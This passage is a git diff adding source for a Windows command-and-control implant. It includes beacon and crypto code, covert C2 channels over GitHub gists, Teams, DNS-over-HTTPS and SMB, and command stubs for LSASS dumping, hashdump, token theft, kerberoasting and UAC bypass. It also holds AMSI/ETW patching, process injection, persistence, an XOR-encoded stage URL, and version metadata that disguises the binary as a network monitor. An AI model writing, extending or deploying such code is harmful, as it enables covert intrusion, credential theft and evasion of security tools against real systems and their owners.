+JSKNNCyy9mgdEm3Tih4U2sSPpuIjhdV6Db1q4Ons7Be7QhtnqiXtRYMh/MHJfNVi +PvryxS3T/dRlAgMBAAGjgZ8wgZwwEwYJKwYBBAGCNxQCBAYeBABDAEEwCwYDVR0P +BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFMZPoj0GY4QJnM5i5ASs +jVy16bYbMDYGA1UdHwQvMC0wK6ApoCeGJWh0dHA6Ly9jcmwueHJhbXBzZWN1cml0 +eS5jb20vWEdDQS5jcmwwEAYJKwYBBAGCNxUBBAMCAQEwDQYJKoZIhvcNAQEFBQAD +ggEBAJEVOQMBG2f7Shz5CmBbodpNl2L5JFMn14JkTpAuw0kbK5rc/Kh4ZzXxHfAR +vbdI4xD2Dd8/0sm2qlWkSLoC295ZLhVbO50WfUfXN+pfTXYSNrsf16GBBEYgoyxt +qZ4Bfj8pzgCT3/3JknOJiWSe5yvkHJEs0rnOfc5vMZnT5r7SHpDwCRR5XCOrTdLa +IR9NmXmd4c8nnxCbHIgNsIpkQTG4DmyQJKSbXHGPurt+HBvbaoAPIbzp26a3QPSy +i6mx5O+aGtA9aZnuqCij4Tyz8LIRnM98QObd50N9otg6tamN8jSZxNQQ4Qb9CYQQ +O+7ETPTsJ3xCwnR8gooJybQDJbw= +-----END CERTIFICATE----- diff --git a/agent/include/adv_lazy.h b/agent/include/adv_lazy.h new file mode 100644 index 0000000..0005a45 --- /dev/null +++ b/agent/include/adv_lazy.h @@ -0,0 +1,31 @@ +#ifndef ADV_LAZY_H +#define ADV_LAZY_H + +#include +#include + +typedef struct { + /* token manipulation */ + BOOL (WINAPI *AdjustTokenPrivileges)(HANDLE,BOOL,PTOKEN_PRIVILEGES,DWORD,PTOKEN_PRIVILEGES,PDWORD); + BOOL (WINAPI *DuplicateTokenEx)(HANDLE,DWORD,LPSECURITY_ATTRIBUTES,SECURITY_IMPERSONATION_LEVEL,TOKEN_TYPE,PHANDLE); + BOOL (WINAPI *ImpersonateLoggedOnUser)(HANDLE); + BOOL (WINAPI *LogonUserA)(LPCSTR,LPCSTR,LPCSTR,DWORD,DWORD,PHANDLE); + BOOL (WINAPI *LookupPrivilegeNameA)(LPCSTR,PLUID,LPSTR,LPDWORD); + BOOL (WINAPI *LookupPrivilegeValueA)(LPCSTR,LPCSTR,PLUID); + BOOL (WINAPI *OpenProcessToken)(HANDLE,DWORD,PHANDLE); + BOOL (WINAPI *OpenThreadToken)(HANDLE,DWORD,BOOL,PHANDLE); + BOOL (WINAPI *RevertToSelf)(void); + /* service management */ + BOOL (WINAPI *CloseServiceHandle)(SC_HANDLE); + BOOL (WINAPI *EnumServicesStatusExA)(SC_HANDLE,SC_ENUM_TYPE,DWORD,DWORD,LPBYTE,DWORD,LPDWORD,LPDWORD,LPDWORD,LPCSTR); + SC_HANDLE (WINAPI *OpenSCManagerA)(LPCSTR,LPCSTR,DWORD); + SC_HANDLE (WINAPI *OpenServiceA)(SC_HANDLE,LPCSTR,DWORD); + BOOL (WINAPI *QueryServiceConfigA)(SC_HANDLE,LPQUERY_SERVICE_CONFIGA,DWORD,LPDWORD); + SERVICE_STATUS_HANDLE (WINAPI *RegisterServiceCtrlHandlerA)(LPCSTR,LPHANDLER_FUNCTION); + BOOL (WINAPI *SetServiceStatus)(SERVICE_STATUS_HANDLE,LPSERVICE_STATUS); + BOOL (WINAPI *StartServiceCtrlDispatcherA)(LPSERVICE_TABLE_ENTRYA); +} adv_api_t; + +const adv_api_t *adv_get(void); + +#endif /* ADV_LAZY_H */ diff --git a/agent/include/beacon.h b/agent/include/beacon.h new file mode 100644 index 0000000..44c505b --- /dev/null +++ b/agent/include/beacon.h @@ -0,0 +1,68 @@ +#ifndef BEACON_H +#define BEACON_H + +#include +#include +#include "crypto.h" + +#define AGENT_ID_LEN 8 +#ifndef BEACON_INTERVAL +#define BEACON_INTERVAL 30000 /* ms — override with -DBEACON_INTERVAL=N */ +#endif +#ifndef JITTER_PCT +#define JITTER_PCT 40 +#endif +#define OUTPUT_BUF_SIZE (10 * 1024 * 1024) + +#pragma pack(push, 1) +typedef struct { + uint16_t magic; /* 0xCC20 */ + uint32_t agent_id_u32; + uint16_t payload_len; +} msg_header_t; +#pragma pack(pop) + +#define MSG_MAGIC 0xCC20 + +typedef struct { + char agent_id[AGENT_ID_LEN + 1]; + char hostname[256]; + char username[128]; + char os_info[128]; + char privileges[32]; + crypto_ctx_t crypto; + int handshake_done; + char *pending_output; + size_t output_len; + char last_task_id[64]; + char parent_id[AGENT_ID_LEN + 1]; /* agent that spawned us, or "" */ +} agent_ctx_t; + +int agent_init(agent_ctx_t *ctx); +void agent_free(agent_ctx_t *ctx); + +char *beacon_build(agent_ctx_t *ctx); +char *beacon_build_handshake(agent_ctx_t *ctx); + +int beacon_parse_response(agent_ctx_t *ctx, const char *raw_b64, + char *cmd_out, size_t cmd_sz, + char *args_out, size_t args_sz, + char *task_id_out, size_t task_id_sz, + char **data_out); + +void beacon_append_output(agent_ctx_t *ctx, const char *data, size_t len); +void beacon_clear_output(agent_ctx_t *ctx); +void beacon_sleep(void); + +void agent_gen_id(char *id_out); +void agent_get_hostname(char *buf, size_t len); +void agent_get_username(char *buf, size_t len); +void agent_get_os(char *buf, size_t len); +void agent_get_privileges(char *buf, size_t len); +void agent_write_parent_id(const char *id); + +void agent_write_gs_flag(void); +int agent_read_gs_flag(void); +int agent_gs_flag_exists(void); /* 1 if flag file is present (not yet consumed) */ + +#endif /* BEACON_H */ diff --git a/agent/include/bof.h b/agent/include/bof.h new file mode 100644 index 0000000..4996d22 --- /dev/null +++ b/agent/include/bof.h @@ -0,0 +1,9 @@ +#ifndef BOF_H +#define BOF_H + +#include + +int cmd_bof(const char *coff_b64, const char *args_b64, + char *output_buf, size_t output_sz); + +#endif /* BOF_H */ diff --git a/agent/include/channels.h b/agent/include/channels.h new file mode 100644 index 0000000..9800905 --- /dev/null +++ b/agent/include/channels.h @@ -0,0 +1,54 @@ +#ifndef CHANNELS_H +#define CHANNELS_H + +#include + +#define CHANNEL_OK 0 +#define CHANNEL_ERR -1 +#define CHANNEL_RETRY -2 + +typedef struct { + char github_token[256]; + char gist_cmd_id[64]; + char gist_out_id[64]; + + char teams_tenant_id[64]; + char teams_client_id[64]; + char teams_client_secret[256]; + char teams_webhook_url[512]; + char teams_team_id[64]; + char teams_channel_id[64]; + + char doh_server[256]; + char doh_domain[128]; + + char beacon_url[512]; + char http_useragent[512]; + char http_extra_headers[1024]; + char http_cert_pin[65]; + + char smb_host[256]; + char smb_pipe[128]; +} channel_config_t; + +void channel_config_init(channel_config_t *cfg); + +int github_send(const channel_config_t *cfg, const char *agent_id, const char *b64); +char *github_recv(const channel_config_t *cfg, const char *agent_id); + +int teams_send(const channel_config_t *cfg, const char *agent_id, const char *b64); +char *teams_recv(const channel_config_t *cfg, const char *agent_id); + +int doh_send(const channel_config_t *cfg, const char *agent_id, const char *b64); +char *doh_recv(const channel_config_t *cfg, const char *agent_id); + +int http_send(const channel_config_t *cfg, const char *agent_id, const char *b64); +char *http_recv(void); + +int smb_send(const channel_config_t *cfg, const char *agent_id, const char *b64); +char *smb_recv(void); + +int channel_send(const channel_config_t *cfg, const char *agent_id, const char *b64); +char *channel_recv(const channel_config_t *cfg, const char *agent_id); + +#endif /* CHANNELS_H */ diff --git a/agent/include/commands.h b/agent/include/commands.h new file mode 100644 index 0000000..fc954b1 --- /dev/null +++ b/agent/include/commands.h @@ -0,0 +1,70 @@ +#ifndef COMMANDS_H +#define COMMANDS_H + +#include + +int cmd_shell(const char *cmdline, char *output_buf, size_t output_size); + +int cmd_upload(const char *local_path, const char *data_b64, + char *output_buf, size_t output_size); + +int cmd_download(const char *local_path, char *output_buf, size_t output_size); + +int cmd_sysinfo(char *output_buf, size_t output_size); + +int cmd_ps(char *output_buf, size_t output_size); +int cmd_getpid(const char *name, char *output_buf, size_t output_size); + +int cmd_spawn(const char *exe_path, const char *fake_cmdline, + const char *real_cmdline, + char *output_buf, size_t output_size); + +int cmd_getuid(char *output_buf, size_t output_size); +int cmd_steal_token(unsigned long pid, char *output_buf, size_t output_size); +int cmd_rev2self(char *output_buf, size_t output_size); +int cmd_make_token(const char *domain_user, const char *password, + char *output_buf, size_t output_size); + +int cmd_privs(const char *action, const char *priv_name, + char *output_buf, size_t output_size); + +int cmd_screenshot(char *output_buf, size_t output_size); + +int cmd_execasm(const unsigned char *asm_bytes, size_t asm_len, + const char *args_str, + char *output_buf, size_t output_size); + +int cmd_lsassdump(const char *out_path, char *output_buf, size_t output_size); + +int cmd_hashdump(const char *dir, char *output_buf, size_t output_size); + +int cmd_portscan(const char *host, unsigned short start, unsigned short end, + int timeout_ms, char *output_buf, size_t output_size); + +int cmd_ls(const char *path, char *output_buf, size_t output_size); +int cmd_mkdir(const char *path, char *output_buf, size_t output_size); +int cmd_rm(const char *path, char *output_buf, size_t output_size); +int cmd_cp(const char *src, const char *dst, char *output_buf, size_t output_size); +int cmd_mv(const char *src, const char *dst, char *output_buf, size_t output_size); + +int cmd_wmiexec(const char *host, const char *cmdline, + char *output_buf, size_t output_size); + +int cmd_kerberoast(const char *args, char *output_buf, size_t output_size); +int cmd_asreproast(const char *args, char *output_buf, size_t output_size); + +int cmd_uacbypass(const char *args, char *output_buf, size_t output_size); +int cmd_privesc(char *output_buf, size_t output_size); + +int cmd_getsystem(const char *args, char *output_buf, size_t output_size); +int cmd_lpe_check(const char *args, char *output_buf, size_t output_size); + +int cmd_reg_query(const char *keypath, const char *valname, + char *output_buf, size_t output_size); +int cmd_reg_set(const char *keypath, const char *valname, + const char *type_str, const char *value, + char *output_buf, size_t output_size); +int cmd_reg_delete(const char *keypath, const char *valname, + char *output_buf, size_t output_size); + +#endif /* COMMANDS_H */ diff --git a/agent/include/crypto.h b/agent/include/crypto.h new file mode 100644 index 0000000..593f1ae --- /dev/null +++ b/agent/include/crypto.h @@ -0,0 +1,56 @@ +#ifndef CRYPTO_H +#define CRYPTO_H + +#include +#include + +#define CHACHA20_KEY_SIZE 32 +#define CHACHA20_NONCE_SIZE 12 +#define POLY1305_TAG_SIZE 16 +#define X25519_KEY_SIZE 32 +#define CRYPTO_OVERHEAD (CHACHA20_NONCE_SIZE + POLY1305_TAG_SIZE) + +typedef struct { + uint8_t session_key[CHACHA20_KEY_SIZE]; + uint8_t key_mask[CHACHA20_KEY_SIZE]; + uint8_t agent_privkey[X25519_KEY_SIZE]; + uint8_t agent_pubkey[X25519_KEY_SIZE]; + int key_established; +} crypto_ctx_t; + +int crypto_init(crypto_ctx_t *ctx); +void crypto_free(crypto_ctx_t *ctx); + +int chacha20_poly1305_encrypt(const uint8_t *key, const uint8_t *nonce, + const uint8_t *pt, size_t pt_len, + uint8_t *ct, uint8_t *tag); + +int chacha20_poly1305_decrypt(const uint8_t *key, const uint8_t *nonce, + const uint8_t *ct, size_t ct_len, + const uint8_t *tag, uint8_t *pt); + +int crypto_gen_keypair(uint8_t *pubkey, uint8_t *privkey); +int crypto_ecdh(const uint8_t *privkey, const uint8_t *peer_pubkey, + uint8_t *shared_secret); + +int crypto_hkdf(const uint8_t *ikm, size_t ikm_len, + const uint8_t *salt, size_t salt_len, + const uint8_t *info, size_t info_len, + uint8_t *okm, size_t okm_len); + +/* ctx->agent_privkey/pubkey must be set first via crypto_gen_keypair() */ +int crypto_do_handshake(crypto_ctx_t *ctx, const uint8_t *server_pubkey); + +int crypto_rand_bytes(uint8_t *buf, size_t len); + +/* Wire format: nonce(12) | ciphertext(n) | tag(16) — caller free()s result */ +uint8_t *crypto_seal(crypto_ctx_t *ctx, + const uint8_t *pt, size_t pt_len, size_t *out_len); +uint8_t *crypto_open(crypto_ctx_t *ctx, + const uint8_t *blob, size_t blob_len, size_t *out_len); + +/* Base64 — caller free()s result */ +char *base64_encode(const uint8_t *data, size_t len); +uint8_t *base64_decode(const char *str, size_t *out_len); + +#endif /* CRYPTO_H */ diff --git a/agent/include/evasion.h b/agent/include/evasion.h new file mode 100644 index 0000000..6a957ee --- /dev/null +++ b/agent/include/evasion.h @@ -0,0 +1,10 @@ +#pragma once +#include + +void evasion_unhook_ntdll(void); +void evasion_patch_etw(void); +void evasion_patch_amsi(void); +void evasion_patch_etw_ti(void); +void evasion_stomp_header(void); +BOOL evasion_apply_thread(HANDLE hThread); +void beacon_sleep_obf(DWORD ms); diff --git a/agent/include/inject.h b/agent/include/inject.h new file mode 100644 index 0000000..642ec08 --- /dev/null +++ b/agent/include/inject.h @@ -0,0 +1,10 @@ +#pragma once +#include + +DWORD inject_find_target(void); +HANDLE inject_nt_open_process(DWORD pid, DWORD access); +int inject_remote(DWORD pid, const BYTE *sc, SIZE_T sc_len); +int inject_thread_hijack(DWORD pid, const BYTE *sc, SIZE_T sc_len); +int inject_earlybird(const BYTE *sc, SIZE_T sc_len); +int inject_self(const BYTE *sc, SIZE_T sc_len); +int inject_stomp(DWORD pid, const BYTE *sc, SIZE_T sc_len, const char *dll_path); diff --git a/agent/include/peb_walk.h b/agent/include/peb_walk.h new file mode 100644 index 0000000..b5a7449 --- /dev/null +++ b/agent/include/peb_walk.h @@ -0,0 +1,86 @@ +#ifndef PEB_WALK_H +#define PEB_WALK_H + +#include +#include + +/* + * _peb_module(name_lower) — get module base via PEB InMemoryOrderModuleList. + * No imports: no GetModuleHandleA in IAT when used exclusively. + * name_lower must be lowercase (e.g. "kernel32.dll"). + * + * Inline LDR_DATA_TABLE_ENTRY (x64 offsets — no winternl.h dependency): + * +0x00 InLoadOrderLinks (LIST_ENTRY, 16 B) + * +0x10 InMemoryOrderLinks (LIST_ENTRY, 16 B) ← list head flinks here + * +0x20 InInitOrderLinks (LIST_ENTRY, 16 B) + * +0x30 DllBase (PVOID, 8 B) + * +0x38 EntryPoint (PVOID, 8 B) + * +0x40 SizeOfImage (ULONG, 4 B) + * +0x44 _pad1 (ULONG, 4 B) + * +0x48 FullDllName.Length (USHORT, 2 B) + * +0x4A FullDllName.MaxLength (USHORT, 2 B) + * +0x4C _pad2 (USHORT[2], 4 B) + * +0x50 FullDllName.Buffer (WCHAR*, 8 B) + * +0x58 BaseDllName.Length (USHORT, 2 B) + * +0x5A BaseDllName.MaxLength (USHORT, 2 B) + * +0x5C _pad3 (USHORT[2], 4 B) + * +0x60 BaseDllName.Buffer (WCHAR*, 8 B) + */ +static inline HMODULE _peb_module(const char *name_lower) +{ +#ifdef _WIN64 + typedef struct { + LIST_ENTRY _load; + LIST_ENTRY _mem; + LIST_ENTRY _init; + void *DllBase; + void *EntryPoint; + ULONG SizeOfImage; + ULONG _pad1; + USHORT FullLen; + USHORT FullMaxLen; + USHORT _pad2[2]; + WCHAR *FullBuf; + USHORT BaseLen; + USHORT BaseMaxLen; + USHORT _pad3[2]; + WCHAR *BaseBuf; + } _ldr_e; + + BYTE *peb = (BYTE *)__readgsqword(0x60); + BYTE *ldr = *(BYTE **)(peb + 0x18); + LIST_ENTRY *head = (LIST_ENTRY *)(ldr + 0x20); /* InMemoryOrderModuleList */ + for (LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) { + /* e points to _mem (+0x10 from struct base) */ + _ldr_e *en = (_ldr_e *)((BYTE *)e - 0x10); + if (!en->BaseBuf || en->BaseLen == 0) continue; + char tmp[64]; int n = en->BaseLen / 2; + if (n >= 64) continue; + for (int i = 0; i < n; i++) { + WCHAR c = en->BaseBuf[i]; + tmp[i] = (char)((c >= L'A' && c <= L'Z') ? c + 32 : c); + } + tmp[n] = '\0'; + if (strcmp(tmp, name_lower) == 0) return (HMODULE)en->DllBase; + } +#else + (void)name_lower; +#endif + return NULL; +} + +/* + * _peb_self_base() — own image base via PEB.ImageBaseAddress (offset 0x10 x64). + * Replaces GetModuleHandleA(NULL) — removes it from IAT. + */ +static inline void *_peb_self_base(void) +{ +#ifdef _WIN64 + BYTE *peb = (BYTE *)__readgsqword(0x60); + return *(void **)(peb + 0x10); +#else + return NULL; +#endif +} + +#endif /* PEB_WALK_H */ diff --git a/agent/include/persist.h b/agent/include/persist.h new file mode 100644 index 0000000..e7343ae --- /dev/null +++ b/agent/include/persist.h @@ -0,0 +1,11 @@ +#pragma once +#include + +typedef enum { + PERSIST_REGISTRY = 0, + PERSIST_SCHTASK = 1, +} persist_method_t; + +int persist_install(persist_method_t method); +int persist_remove(persist_method_t method); +int persist_auto(void); diff --git a/agent/include/socks.h b/agent/include/socks.h new file mode 100644 index 0000000..e5611ed --- /dev/null +++ b/agent/include/socks.h @@ -0,0 +1,15 @@ +#ifndef SOCKS_H +#define SOCKS_H + +#include + +int socks_start(unsigned short port, char *output_buf, size_t output_sz); +int socks_stop(char *output_buf, size_t output_sz); +int socks_running(void); + +int rportfwd_start(unsigned short lport, const char *rhost, unsigned short rport, + char *out, size_t outsz); +int rportfwd_stop(unsigned short lport, char *out, size_t outsz); +int rportfwd_list(char *out, size_t outsz); + +#endif /* SOCKS_H */ diff --git a/agent/include/stager_config.h b/agent/include/stager_config.h new file mode 100644 index 0000000..8b21754 --- /dev/null +++ b/agent/include/stager_config.h @@ -0,0 +1,17 @@ +/* AUTO-GENERATED by tools/gen_stager_config.py � do not edit manually. */ +#ifndef STAGER_CONFIG_H +#define STAGER_CONFIG_H + +#ifndef CFG_XOR_KEY_LEN +#define CFG_XOR_KEY_LEN 16 +static const unsigned char CFG_XOR_KEY[16] = { 0x7a, 0x3f, 0x91, 0xc4, 0x52, 0x88, 0xb1, 0xde, 0xad, 0xbe, 0xef, 0x13, 0x37, 0xca, 0xfe, 0x42 }; +#endif + +/* STAGE_URL � XOR-encoded (96 bytes) */ +static const unsigned char CFG_STAGE_URL[] = {0x12, 0x4b, 0xe5, 0xb4, 0x68, 0xa7, 0x9e, 0xef, 0x9f, 0x89, 0xc1, 0x23, 0x19, 0xfa, 0xd0, 0x73, 0x40, 0x07, 0xa1, 0xf4, 0x62, 0xa7, 0xd0, 0xae, 0xc4, 0x91, 0x9c, 0x67, 0x56, 0xad, 0x9b, 0x6d, 0x18, 0x5c, 0xf5, 0xf4, 0x64, 0xe9, 0x82, 0xea, 0x98, 0x89, 0x8c, 0x21, 0x03, 0xfa, 0xcc, 0x72, 0x4b, 0x06, 0xa4, 0xf4, 0x66, 0xb9, 0x83, 0xec, 0xc8, 0x89, 0xd8, 0x76, 0x06, 0xf9, 0xcd, 0x26, 0x18, 0x0b, 0xa1, 0xa1, 0x6b, 0xea, 0x88, 0xba, 0x95, 0x8b, 0xda, 0x75, 0x0e, 0xf9, 0xcd, 0x7b, 0x19, 0x5a, 0xf0, 0xf0, 0x66, 0xbb, 0xd0, 0xea, 0x94, 0x8c, 0xd6, 0x24, 0x52, 0xac, 0xc6, 0x76, 0x00}; +#define CFG_STAGE_URL_LEN 96 + +/* STAGE_KEY � ChaCha20 key, XOR-encoded (32 bytes) */ +static const unsigned char CFG_STAGE_KEY[32] = {0x50, 0x7e, 0xe8, 0x62, 0x2f, 0x68, 0x44, 0xf9, 0x0b, 0xc0, 0xd9, 0xc2, 0xd5, 0x25, 0xb9, 0x32, 0x58, 0x6c, 0x9a, 0x9a, 0x62, 0xc5, 0xf3, 0x16, 0xab, 0xbb, 0x1a, 0x2c, 0x53, 0x9b, 0x99, 0xff}; + +#endif /* STAGER_CONFIG_H */ diff --git a/agent/include/util.h b/agent/include/util.h new file mode 100644 index 0000000..7e7a9b8 --- /dev/null +++ b/agent/include/util.h @@ -0,0 +1,11 @@ +#ifndef UTIL_H +#define UTIL_H + +const char *random_ua(void); + +#ifndef HTTP_ONLY +#include +void curl_apply_opsec(CURL *curl); +#endif /* HTTP_ONLY */ + +#endif /* UTIL_H */ diff --git a/agent/rebuild_agent.ps1 b/agent/rebuild_agent.ps1 new file mode 100644 index 0000000..ac03aea --- /dev/null +++ b/agent/rebuild_agent.ps1 @@ -0,0 +1,38 @@ +$AgentDir = $PSScriptRoot +$Make = "C:\msys64\usr\bin\make.exe" + +Set-Location $AgentDir + +# Kill agent if running, wait for OS to release file lock +Stop-Process -Name "agent" -Force -ErrorAction SilentlyContinue +Start-Sleep -Milliseconds 800 + +# Step 1: regen obfuscation config + fresh EVS_KEY (polymorphisme par build) +Write-Host "[*] Generation config (EVS_KEY aleatoire)..." -ForegroundColor Cyan +$cfg_out = & $Make config 2>&1 +$cfg_err = $cfg_out | Select-String -Pattern "error:" | Where-Object { $_ -notmatch "0 error" } +if ($cfg_err) { + Write-Host "[!] Erreur config :" -ForegroundColor Red + $cfg_err | ForEach-Object { Write-Host " $_" -ForegroundColor Red } + exit 1 +} +$cfg_out | Select-String "\[ok\]|EVS_KEY" | ForEach-Object { Write-Host " $_" -ForegroundColor DarkCyan } + +# Step 2: compile +Write-Host "[*] Compilation..." -ForegroundColor Cyan +$output = & $Make lean 2>&1 +$errors = $output | Select-String -Pattern "error:" | Where-Object { $_ -notmatch "0 error" } + +if ($errors) { + Write-Host "[!] Erreurs de compilation :" -ForegroundColor Red + $errors | ForEach-Object { Write-Host " $_" -ForegroundColor Red } + exit 1 +} + +$ok = $output | Select-String -Pattern "\[ok\]" +if ($ok) { + Write-Host "[+] $ok" -ForegroundColor Green +} else { + Write-Host "[?] Compilation terminee (verifier manuellement)" -ForegroundColor Yellow + $output | Select-String -Pattern "warning:|error:" | ForEach-Object { Write-Host " $_" } +} diff --git a/agent/res/agent.manifest b/agent/res/agent.manifest new file mode 100644 index 0000000..c958800 --- /dev/null +++ b/agent/res/agent.manifest @@ -0,0 +1,30 @@ + + + + Network Performance Monitor + + + + + + + + + + + + + + + + + + PerMonitorV2 + true + + + diff --git a/agent/res/agent.rc b/agent/res/agent.rc new file mode 100644 index 0000000..db9f01a --- /dev/null +++ b/agent/res/agent.rc @@ -0,0 +1,32 @@ +#include + +VS_VERSION_INFO VERSIONINFO + FILEVERSION 2,3,0,1 + PRODUCTVERSION 2,3,0,1 + FILEFLAGSMASK VS_FFI_FILEFLAGSMASK + FILEFLAGS 0x0L + FILEOS VOS_NT_WINDOWS32 + FILETYPE VFT_APP + FILESUBTYPE VFT2_UNKNOWN +BEGIN + BLOCK "StringFileInfo" + BEGIN + BLOCK "040904B0" + BEGIN + VALUE "CompanyName", "Celerix Technologies Inc." + VALUE "FileDescription", "Network Performance Monitor" + VALUE "FileVersion", "2.3.0.1" + VALUE "InternalName", "netpulse" + VALUE "LegalCopyright", "Copyright (C) 2025 Celerix Technologies Inc. All rights reserved." + VALUE "OriginalFilename", "NetPulse.exe" + VALUE "ProductName", "NetPulse Suite" + VALUE "ProductVersion", "2.3" + END + END + BLOCK "VarFileInfo" + BEGIN + VALUE "Translation", 0x0409, 0x04B0 + END +END + +1 RT_MANIFEST "agent.manifest" diff --git a/agent/src/adv_lazy.c b/agent/src/adv_lazy.c new file mode 100644 index 0000000..009ac0e --- /dev/null +++ b/agent/src/adv_lazy.c @@ -0,0 +1,51 @@ +#include "adv_lazy.h" +#include "evs_strings.h" +#include + +static adv_api_t _adv; +static int _adv_ok = 0; + +static void _xdec(const unsigned char *enc, size_t n, char *out) { + volatile unsigned char k = EVS_KEY; + for (size_t i = 0; i < n; i++) out[i] = (char)(enc[i] ^ k); + out[n] = '\0'; +} + +const adv_api_t *adv_get(void) +{ + if (_adv_ok) return &_adv; + + char dll[16], fn[40]; + _xdec(EVS_dll_advapi32, sizeof(EVS_dll_advapi32), dll); + HMODULE h = LoadLibraryA(dll); + SecureZeroMemory(dll, sizeof(dll)); + if (!h) return &_adv; + + struct { const unsigned char *enc; size_t n; void **p; } t[] = { + { EVS_fn_AdjustTokenPrivileges, sizeof(EVS_fn_AdjustTokenPrivileges), (void **)&_adv.AdjustTokenPrivileges }, + { EVS_fn_DuplicateTokenEx, sizeof(EVS_fn_DuplicateTokenEx), (void **)&_adv.DuplicateTokenEx }, + { EVS_fn_ImpersonateLoggedOnUser, sizeof(EVS_fn_ImpersonateLoggedOnUser), (void **)&_adv.ImpersonateLoggedOnUser }, + { EVS_fn_LogonUserA, sizeof(EVS_fn_LogonUserA), (void **)&_adv.LogonUserA }, + { EVS_fn_LookupPrivilegeNameA, sizeof(EVS_fn_LookupPrivilegeNameA), (void **)&_adv.LookupPrivilegeNameA }, + { EVS_fn_LookupPrivilegeValueA, sizeof(EVS_fn_LookupPrivilegeValueA), (void **)&_adv.LookupPrivilegeValueA }, + { EVS_fn_OpenProcessToken, sizeof(EVS_fn_OpenProcessToken), (void **)&_adv.OpenProcessToken }, + { EVS_fn_OpenThreadToken, sizeof(EVS_fn_OpenThreadToken), (void **)&_adv.OpenThreadToken }, + { EVS_fn_RevertToSelf, sizeof(EVS_fn_RevertToSelf), (void **)&_adv.RevertToSelf }, + { EVS_fn_CloseServiceHandle, sizeof(EVS_fn_CloseServiceHandle), (void **)&_adv.CloseServiceHandle }, + { EVS_fn_EnumServicesStatusExA, sizeof(EVS_fn_EnumServicesStatusExA), (void **)&_adv.EnumServicesStatusExA }, + { EVS_fn_OpenSCManagerA, sizeof(EVS_fn_OpenSCManagerA), (void **)&_adv.OpenSCManagerA }, + { EVS_fn_OpenServiceA, sizeof(EVS_fn_OpenServiceA), (void **)&_adv.OpenServiceA }, + { EVS_fn_QueryServiceConfigA, sizeof(EVS_fn_QueryServiceConfigA), (void **)&_adv.QueryServiceConfigA }, + { EVS_fn_RegisterServiceCtrlHandlerA,sizeof(EVS_fn_RegisterServiceCtrlHandlerA),(void **)&_adv.RegisterServiceCtrlHandlerA}, + { EVS_fn_SetServiceStatus, sizeof(EVS_fn_SetServiceStatus), (void **)&_adv.SetServiceStatus }, + { EVS_fn_StartServiceCtrlDispatcherA,sizeof(EVS_fn_StartServiceCtrlDispatcherA),(void **)&_adv.StartServiceCtrlDispatcherA}, + }; + for (int i = 0; i < 17; i++) { + _xdec(t[i].enc, t[i].n, fn); + *t[i].p = (void *)GetProcAddress(h, fn); + SecureZeroMemory(fn, t[i].n + 1); + } + + _adv_ok = 1; + return &_adv; +} diff --git a/agent/src/beacon.c b/agent/src/beacon.c new file mode 100644 index 0000000..be3f548 --- /dev/null +++ b/agent/src/beacon.c @@ -0,0 +1,620 @@ +#include "beacon.h" +#include "agent_config.h" +#include "evs_strings.h" +#include "peb_walk.h" +#include "crypto.h" +#include "evasion.h" +#include "adv_lazy.h" +#include +#include +#include +#include +#include +#include +#include + +/* Decode one XOR-obfuscated config string from agent_config.h */ +static void _cfg_decode(const unsigned char *src, size_t len, char *dst) +{ + for (size_t i = 0; i < len; i++) + dst[i] = (char)(src[i] ^ CFG_XOR_KEY[i % CFG_XOR_KEY_LEN]); + dst[len] = '\0'; +} + +/* GetComputerNameA — removes from IAT */ +typedef BOOL (WINAPI *_GCN_t)(LPSTR, LPDWORD); +static BOOL _gcna(LPSTR buf, LPDWORD sz) { + static _GCN_t fn = NULL; + if (!fn) { + char fs[20], ks[14]; volatile unsigned char xk = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_GetComputerNameA); i++) fs[i] = (char)(EVS_fn_GetComputerNameA[i] ^ xk); + fs[sizeof(EVS_fn_GetComputerNameA)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_kernel32); i++) ks[i] = (char)(EVS_dll_kernel32[i] ^ xk); + ks[sizeof(EVS_dll_kernel32)] = '\0'; + HMODULE m = _peb_module(ks); SecureZeroMemory(ks, sizeof(ks)); + if (m) fn = (_GCN_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + return fn ? fn(buf, sz) : FALSE; +} + +/* machine fingerprinting */ + +void agent_get_hostname(char *buf, size_t len) +{ + DWORD sz = (DWORD)len; + if (!_gcna(buf, &sz)) + strncpy(buf, "unknown", len - 1); + buf[len - 1] = '\0'; +} + +void agent_get_username(char *buf, size_t len) +{ + DWORD sz = (DWORD)len; + if (!GetUserNameA(buf, &sz)) + strncpy(buf, "unknown", len - 1); + buf[len - 1] = '\0'; +} + +/* GetNativeSystemInfo — removes from IAT */ +typedef void (WINAPI *_GNS_t)(LPSYSTEM_INFO); +static void _gns(LPSYSTEM_INFO si) { + static _GNS_t fn = NULL; + if (!fn) { + char fs[22], ks[14]; volatile unsigned char xk = EVS_KEY; + for (int i = 0; i < (int)sizeof(EVS_fn_GetNativeSystemInfo); i++) fs[i] = (char)(EVS_fn_GetNativeSystemInfo[i] ^ xk); + fs[sizeof(EVS_fn_GetNativeSystemInfo)] = '\0'; + for (int i = 0; i < (int)sizeof(EVS_dll_kernel32); i++) ks[i] = (char)(EVS_dll_kernel32[i] ^ xk); + ks[sizeof(EVS_dll_kernel32)] = '\0'; + HMODULE m = _peb_module(ks); SecureZeroMemory(ks, sizeof(ks)); + if (m) fn = (_GNS_t)(void *)GetProcAddress(m, fs); + SecureZeroMemory(fs, sizeof(fs)); + } + if (fn) fn(si); + else GetSystemInfo(si); +} + +void agent_get_os(char *buf, size_t len) +{ + OSVERSIONINFOEXW osvi; + memset(&osvi, 0, sizeof(osvi)); + osvi.dwOSVersionInfoSize = sizeof(osvi); + typedef NTSTATUS(WINAPI * RtlGetVersion_t)(PRTL_OSVERSIONINFOW); + char _dn[10], _fn[15]; + EVS_D(_dn, EVS_dll_ntdll); EVS_D(_fn, EVS_fn_RtlGetVersion); + HMODULE ntdll = _peb_module(_dn); SecureZeroMemory(_dn, sizeof(_dn)); + RtlGetVersion_t fn = (RtlGetVersion_t)(void *)GetProcAddress(ntdll, _fn); + SecureZeroMemory(_fn, sizeof(_fn)); + if (fn && fn((PRTL_OSVERSIONINFOW)&osvi) == 0) + { + int is64 = 0; + SYSTEM_INFO si; + _gns(&si); + is64 = (si.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64); + snprintf(buf, len, "Windows %lu.%lu Build %lu %s", + osvi.dwMajorVersion, 